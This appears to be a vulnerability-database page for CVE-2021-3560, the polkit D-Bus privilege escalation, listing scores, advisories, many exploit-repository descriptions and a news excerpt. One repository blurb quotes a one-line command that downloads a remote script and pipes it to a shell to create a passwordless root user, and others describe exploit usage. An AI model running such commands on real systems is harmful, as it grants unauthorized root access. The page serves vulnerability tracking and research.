7.8
CVSSv3

CVE-2021-3560

Published: 16/02/2022 Updated: 07/11/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 655
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local malicious user to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

polkit project polkit

debian debian linux 11.0

canonical ubuntu linux 20.04

redhat virtualization 4.0

redhat virtualization_host 4.0

redhat openshift_container_platform 4.7

Vendor Advisories

Debian Bug report logs - #989429 policykit-1: CVE-2021-3560: local privilege escalation using polkit_system_bus_name_get_creds_sync() Package: src:policykit-1; Maintainer for src:policykit-1 is Utopia Maintenance Team <pkg-utopia-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> ...
A security issue was found in polkit before version 0119 When a requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts, the process cannot get a unique uid and pid of the process and it cannot verify the privileges of the requesting process ...

Exploits

Polkit version Polkit 0105-26 0117-2 suffers from a local privilege escalation vulnerability ...

Github Repositories

mitre_example Пример APT, выдуманный из головы Предположим, что мы узнали о компании, которая очень гордится тем, что все ее сотрудники сидят на убунтах, а не на винде Ну, например, увидели статью на хабре навроде "

Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!

CVE-2021-3560 Polkit Instant Root Exploit You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in: sh -c "$(curl -sSL rawgithubusercontentcom/n3onhacks/CVE-2021-3560/main/polkitsh)" Or you can download the sh or copy and paste it Run and Instant Root User created is named 'n3on' with no password, script then sw

securite_devoirs Devoir 1 - Sécurité Ce répertoire contient un rapport et des fichiers pour réaliser une expérimentation sur l'exploitation de la faille CVE-2021-3560 Cette faille permet à un utilisateur non privilégié d'obtenir un compte administrateur sur un système vulnérable comme Ubuntu 2014

CVE-2021-3560 - Polkit Local Privilege Escalation ⚠️ For educational and authorized security research purposes only Original Exploit Authors Very grateful to the original PoC author @UNICORDev by (@NicPWNs and @Dev-Yeoj) Description It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the request

CVE-2021-3560 analysis

CVE-2021-3560 PolKit条件竞争本地提权分析 [toc] 漏洞简介 漏洞编号: CVE-2021-3560 漏洞评分: 漏洞产品: linux PolKit (polkitd) 影响范围: 源代码 0113 引入;wwwvenustechcomcn/new_type/aqtg/20210611/22788html RHEL 8 Fedora 21及更高版本 Debian testing (“bullseye”) Ubuntu 2004 利用条件: linux 本地;dbus + polkit

CVE-2021-3560 Local PrivEsc Exploit

polkadots CVE-2021-3560 Local PrivEsc Exploit This exploit creates a new privileged user with which you can escalate to root Affected Distributions: RHEL 8 Fedora 21 Debian testing (Bullseye) Ubuntu 2004 Usage /polkadots -a [Account] -n [Account name] -h [Password hash] -i [iterations] Generate hashed passwords with: openssl passwd -6 password@123 Defaults: -a

Windows Privilege Escalation Exploit for CVE-2021-1732 (Win32k) - Local Privilege Escalation *For educational and authorized security research purposes only* Original Exploit Authors @Exploit Blizzard Vulnerability Description A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM The flaw exists in how

Supporting programs that leverage efforts to research Cortex XDR

XDR-LabSetupsh Description This program is used in conjunction with the PoC writeup It is used as a practical way to simply establish the lab environment necessary to exploit CVE-2021-3560 and view how Cortex XDR captures such events Options Help: Display command information and about Initiate Checklist Scan: Go through checklist of pre-requisites required for exploit to

Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation

Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation Like this repo? Give us a ⭐! For educational and authorized security research purposes only Exploit Author @UNICORDev by (@NicPWNs and @Dev-Yeoj) Vulnerability Description It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor

Automatic Explotation PoC for Polkit CVE-2021-3560

polkit-auto-exploit Automatic Explotation PoC for Polkit CVE-2021-3560 Summary CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to

Polkit 0.105-26 0.117-2 - Local Privilege Escalation

ROOT-CVE-2021-3560 Polkit 0105-26 0117-2 - Local Privilege Escalation

Polkit-exploit - CVE-2021-3560 Privilege escalation with polkit - CVE-2021-3560 Summary CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a pa

CVE-2021-3560-Polkit-Privilege-Esclation PoC Original research by Kevin Backhouse This is just a Bash PoC script, that automates the exploitation steps mentioned in Kevin Backhouse's blog Read his post on this vulnerability: githubblog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ Usage USAGE: /pocsh -h --help -u=Enter custom use

ubuntu new PrivEsc race condition vulnerability

CVE-2021-3560 CTF a simple poc script for polkit PrivEsc vulnerability in ubunutu

a reliable C based exploit and writeup for CVE-2021-3560.

CVE-2021-3560 a reliable C based exploit for CVE-2021-3560 Summary: Yestreday i stumbled upon this blog post by Kevin Backhouse (discovered this vulnerability), i tried the bash commands provided in the blogpost and to my surpise it worked on my Kali Linux box! CVE-2021-3560 is an authentication bypass on polkit, which allows an unprivileged user to call privileged methods usi

NYCY_homework_&_meeting

A NYCU CVE-2021-3560 research QQ A CVE-2021-3560 poc, easy to read and learn reference from POC by hakivvi Thanks to hakivvi He saved a lot of my time run: compile the exploit: $ gcc -g cve-2021-3560_pocc -o cve-2021-3560 /usr/lib/x86_64-linux-gnu/libdbus-1so /usr/lib/x86_64-linux-gnu/libzso Simply Checking whether this machine

Capstone Repo

SEC335 Target Generation Overview Summary This project involved myself and my Capstone team assisting one of our professors, Devin Paden in developing and deploying targets for students to attack in the SEC335 Ethical Hacking course offered by Champlian College The goal was to turn the class into one where labs were operated similiarly to a Hack the Box/CTF format in order to

Linux Privilege Escalation Exploit for CVE-2021-3560 (Sudoedit aka -e) - Local Privilege Escalation *For educational and authorized security research purposes only* Original Exploit Authors n3m1dotsys Vulnerability Description In Sudo before 1912p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUA

Privilege escalation with polkit - CVE-2021-3560

Polkit-exploit - CVE-2021-3560 Privilege escalation with polkit - CVE-2021-3560 Summary CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a pa

Hack The Box writeup for Paper

htb-writeup-paper scan ip address nmap -sC -sV {ip_address} check the open ports and see what can we discover further from it Get request to the URL curl --head {ip_address} we get back some interesting information (officepaper) we can add this information to out /etc/hosts file and visit the URL afterwards checking on the website we can see it runs WP, we can get a scan and c

polkit exploit script v1.0

CVE-2021-3560_PoC polkit exploit script Automated script for escalating to root using polkit service Requirements SSH server (this is to avoid having authentication popups through GNOME) Vulnerable Linux distribution: Distribution Vulnerable? RHEL 7 No RHEL 8 Yes Fedora 20 (or ear

Polkit-CVE-2021-3560 Background In early 2021 a researcher named Kevin Backhouse discovered a seven year old privilege escalation vulnerability (since designated CVE-2021-3560) in the Linux polkit utility Fortunately, different distributions of Linux (and even different versions of the same distributions) use different versions of the software, meaning that only some are vulne

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent) C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation: ricterzme/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalationtxt noahblog360cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation Contributors Code by s

OSCP cheat sheet 2023 0 Preparation Read the OSCP dos and don'ts Practice taking screenshot while you hack Get a document file ready to paste your walkthrough screenshots 1 Recon Recon is an essential OSCP skill set If you do have good recon skills, it makes the exam much easier The tools included in this cheat sheet might not be enough The content is created based

Exploitation of the CVE-2021-3560 polkit vulnerability

Polkit Vulnerability - CVE-2021-3560 📕 Introduction In 2021, a researcher named Kevin BackHouse discovered a privilege escalation vulnerability in the polkit utility however, not all linux versions are vulnerable to polkit Below is an example of a vulnerable version; Red Hat Enterprise Linux 8 Fedora 21 (or later) Debian Testing ("Bullseye") Ubuntu 2004 LTS (

CVE-2021-3560-Polkit-Privilege-Esclation PoC About This is just a Bash PoC script, that automates the exploitation steps Usage USAGE: /pocsh -h --help -u=Enter custom username to insert (OPTIONAL) -p=Enter custom password to insert (OPTIONAL) -f=y, To skip vulnerability check and force exploitation (OPTIONAL) -t=Enter custom sleep time, instead

Linux Privilege Escalation Cheatsheet This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples There are multiple ways to perform the same task We have performed and compiled this list based on our experience Please share this with your connections and direct queries and feed

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

Linux Privilege Escalation Cheatsheet This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples There are multiple ways to perform the same task We have performed and compiled this list based on our experience Please share this with your connections and direct queries and feed

<<<<<<< HEAD Traitor_ _ _ ======= Traitor _ _ _ branch2 Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dock

Linux Privilege Escalation Cheatsheet This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples There are multiple ways to perform the same task We have performed and compiled this list based on our experience Please share this with your connections and direct queries and feed

Exploit for CVE-2021-4034 (Pkexec) - Local Privilege Escalation For educational and authorized security research purposes only Original Exploit Authors @arthepsy Vulnerability Description A local privilege escalation vulnerability was found on polkit's pkexec utility The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privilege

汽车内核提取漏洞

vehicle-kernel-exploit 汽车内核提取漏洞 0x00支持的漏洞 Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560 CVE-2022-23222 0x01Traitor githubcom/liamg/traitor?tab=readme-ov-file#/ 打包了一堆方法来利用本地错误配置和漏洞来提升至root shell: Nearly all of GTFOBins Wr

Linux Privilege Escalation Cheatsheet This cheatsheet is aimed at the OSCP aspirants to help them understand the various methods of Escalating Privilege on Linux based Machines and CTFs with examples There are multiple ways to perform the same tasks We have performed and compiled this list based on our experience Please share this with your connections and direct queries and

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

This cheatsheet is aimed at the OSCP aspirants to help them understand the various methods of Escalating Privilege on Linux based Machines and CTFs with examples.

Linux Privilege Escalation Cheatsheet This cheatsheet is aimed at OSCP aspirants to help them understand the various methods of escalating privilege on Linux-based machines and CTFs with examples There are multiple ways to perform the same task We have performed and compiled this list based on our experience Please share this with your connections and direct queries and feed

Traitor_ Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

⬆️ ☠️ 🔥 Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

HTB - PAPER - CTF 1- Conectar com a VPN e o lab do HTB 2- Iniciar a máquina para receber o IP 3- Acessar o IP no navegador, para começar a analisar Apenas uma página estática ​ 4- Utilizar o nmap para encontrar portas e serviços ​ nmap -sV IP O -sV deixa você saber a versão do servidor É importante saber a vers&atil

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

<<<<<<< HEAD Traitor_ _ _ ======= Traitor _ _ _ branch2 11 12 13 Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Wr

HTB - PAPER - CTF 1- Conectar com a VPN e o lab do HTB 2- Iniciar a máquina para receber o IP 3- Acessar o IP no navegador, para começar a analisar Apenas uma página estática ​ 4- Utilizar o nmap para encontrar portas e serviços ​ nmap -sV IP O -sV deixa você saber a versão do servidor É importante saber a vers&atil

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

Traitor Automatically exploit low-hanging fruit to pop a root shell Linux privilege escalation made easy! Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities in order to pop a root shell: Nearly all of GTFOBins Writeable dockersock CVE-2022-0847 (Dirty pipe) CVE-2021-4034 (pwnkit) CVE-2021-3560

CVE-2021-3560-Polkit-Privilege-Escalation by Mark, Qingchen Yu To build the container with docker build -t <image tag of your choice> To run the container docker run -it <image tag name> start with startsh Measura Execution Time: Note the 'real' time and

f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation

CVE-2021-3560-Polkit-DBus Simple proof of concenpt script for CVE-2021-3560 Polkit D-Bus privilege escalation For more information, see original blog post: githubblog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ Usage Try running the script again with a different (unregistered) username in case of a fail lowprivuser@machine:~$ /pocsh <usern

A Collection of Privilege Escalation Tools Windows GhostPack Compiled Binaries PowerUpps1 WinPEASanyexe/WinPEASbat Linux lsesh LinEnumsh lessh Polkit Exploit (CVE-2021-3560) Sudo Exploit (CVE-2021-3156) Docker deepcssh

Recent Articles

Seven-year-old make-me-root bug in Linux service polkit patched
The Register • Thomas Claburn in San Francisco • 11 Jun 2021

Error handling? Nah, let's just unlock everything and be done with it

A seven-year-old privilege escalation vulnerability that's been lurking in several Linux distributions was patched last week in a coordinated disclosure. In a blog post on Thursday, GitHub security researcher Kevin Backhouse recounted how he found the bug (CVE-2021-3560) in a service called polkit associated with systemd, a common Linux system and service manager component. Introduced in commit bfa5036 seven years ago and initially shipped in polkit version 0.113, the bug traveled different path...